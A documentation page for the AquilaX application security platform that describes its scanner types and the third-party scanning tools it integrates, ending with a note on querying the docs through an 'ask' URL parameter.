# Scanners

<table><thead><tr><th width="137.33333333333331">Scanner</th><th width="523">Description</th><th>Logo</th></tr></thead><tbody><tr><td><strong>Secret</strong></td><td>Identification of passwords, API keys and other highly confidential information in the source code</td><td><img src="/files/x3NFpiqiy7FRF3WFnvdP" alt=""></td></tr><tr><td><strong>PII</strong></td><td>Identification of information related to PII (Personal Identifiable Information) that maybe leaked into a source code</td><td><img src="/files/6sgHI8s6xnhBihs2oOB3" alt="" data-size="original"></td></tr><tr><td><strong>SAST</strong></td><td>Static Application Security Testing - Security scanning for vulnerabilities introduce unintentional by developers during the creation of source code. This also often referred to code-scanning or 1st party code scanning</td><td><img src="/files/56TFnsVlaymlJuFJ6TZT" alt="" data-size="original"></td></tr><tr><td><strong>SCA</strong></td><td>Software Composition Analysis is a technic to identify the usage of 3rd party (usually Open Source libs) that may contain known vulnerabilities</td><td><img src="/files/IioSTCoeq5zcxnwUK03Y" alt="" data-size="original"></td></tr><tr><td><strong>Container</strong></td><td>Container Scanning is a technic that even if is included to SCA, is usually linked to the identification of vulnerable software, rather than vulnerable libraries. Is used during Image creation</td><td><img src="/files/OMnltApzMQ11sBrYtkoB" alt="" data-size="original"></td></tr><tr><td><strong>IaC</strong></td><td>Infrastructure as a Code scanning is linked to identify security misconfiguration in the infrastructure as defined by terraform or cloud formation config files</td><td><img src="/files/uMau4SK4LWmaPwSIiCzb" alt="" data-size="original"></td></tr><tr><td><strong>API</strong></td><td>API scanning is a process of identifying potential security issues based on the definition of the API as from OpenAPI specification</td><td><img src="/files/n46QL0k4cCX5xZyNk59s" alt="" data-size="original"></td></tr><tr><td><strong>Malware</strong></td><td>Malware scanning in the source code (in AquilaX case) is a capability to identify intentional malicious code as backdoors, trojan horses, virus etc.. that maybe injected into the application source code</td><td><img src="/files/GRXcdg5BVYIMbjvblZ2j" alt="" data-size="original"></td></tr></tbody></table>

{% embed url="<https://www.youtube.com/watch?v=g9duRq9B-lQ>" %}
Presented by Cristina, Risk Manager @ AquilaX AI
{% endembed %}

## Scanning Functionalities: <a href="#scanning-functionalities" id="scanning-functionalities"></a>

### **Secret & API Keys Scanning**

AquilaX employs advanced algorithms to scan codebases for hardcoded secrets and API keys. This includes credentials such as passwords, tokens, and sensitive API keys which, if exposed, could lead to security breaches. By identifying these vulnerabilities, AquilaX helps developers secure their applications against unauthorized access.

### **PII & Confidential Data Detection**

Personal Identifiable Information (PII) detection is crucial for compliance with data protection regulations like GDPR and CCPA. AquilaX utilizes pattern matching and machine learning algorithms to detect PII and other confidential data within source code and repositories. This includes sensitive information like social security numbers, credit card details, and personal addresses, helping organizations maintain data privacy and integrity.

### **Static Application Security Testing (SAST)**

SAST is a critical component of secure software development. AquilaX performs static code analysis to identify vulnerabilities, security flaws, and coding errors in applications at an early stage of the development lifecycle. By scanning the source code, AquilaX can detect common security issues such as SQL injection, cross-site scripting (XSS), and buffer overflows, enabling developers to remediate these issues before deployment.

### **Software Composition Analysis (SCA)**

AquilaX conducts dependency checking to identify vulnerable components and libraries within the software stack. By analyzing third-party dependencies and their associated vulnerabilities, AquilaX helps organizations mitigate risks related to outdated or insecure software components, ensuring the integrity and security of the application's dependencies.

### **Container Scanning**

Containerization has become increasingly popular for deploying and managing applications. AquilaX provides container scanning capabilities to assess the security posture of Docker images and containerized environments. By scanning containers for vulnerabilities, misconfigurations, and compliance issues, AquilaX helps organizations maintain the security of their containerized deployments.

### **Infrastructure as Code (IaC) Scanning**

With the rise of Infrastructure as Code (IaC) practices, security vulnerabilities in infrastructure configurations can have significant consequences. AquilaX offers IaC scanning capabilities to analyze configuration files (e.g., Terraform, CloudFormation) and detect misconfigurations, security loopholes, and compliance violations. This ensures that infrastructure deployments adhere to security best practices and compliance standards.

### **API Security**

APIs play a critical role in modern application architectures, but they also introduce security risks if not properly secured. AquilaX specializes in API security testing, identifying vulnerabilities such as insecure authentication mechanisms, excessive data exposure, and insufficient access controls. By assessing the security of APIs, AquilaX helps organizations safeguard their digital assets and prevent API-related security breaches.

### **Uncovering Backdoor Functionalities**

Backdoors represent hidden entry points into a system, often introduced maliciously or inadvertently during development. AquilaX utilizes advanced techniques to uncover backdoor functionalities within source code and binaries. By identifying and mitigating backdoors, AquilaX helps organizations prevent unauthorized access and maintain the integrity of their applications.

## 3rd party tools

AquilaX acknowledges the significant contributions of other teams in the field by integrating third-party scanners directly into its engine. This approach ensures that customers benefit from a seamless and user-friendly application security (AppSec) scanning experience. In addition to our in-house developed engines, here is a list of the scanners we utilize:

<figure><img src="/files/ZSdohwsgJr36wEJRVH8e" alt=""><figcaption><p>AquilaX 3rd party scanners</p></figcaption></figure>

<table><thead><tr><th width="152">Tool</th><th width="86" data-type="checkbox">Secret</th><th width="59" data-type="checkbox">PII</th><th width="75" data-type="checkbox">SAST</th><th width="69" data-type="checkbox">SCA</th><th width="60" data-type="checkbox">IaC</th><th width="108" data-type="checkbox">Container</th><th width="60" data-type="checkbox">API</th><th data-type="checkbox">Malware</th></tr></thead><tbody><tr><td>AquilaX</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td></tr><tr><td>Checkov</td><td>true</td><td>false</td><td>false</td><td>true</td><td>true</td><td>true</td><td>true</td><td>false</td></tr><tr><td>GitLeaks</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Bandit</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Pyre</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>CatchIT</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>GoSec</td><td>true</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Horusec</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>insider</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Syft</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Gypre</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td></tr><tr><td><a href="https://github.com/jeremylong/DependencyCheck">Dependency-Check</a></td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://github.com/Yelp/detect-secrets">detect-secrets</a></td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://github.com/nccgroup/sobelow">sobelow</a></td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://kubesec.io/">Kubesec</a></td><td>false</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td></tr></tbody></table>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.aquilax.ai/user-manual/scanners.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.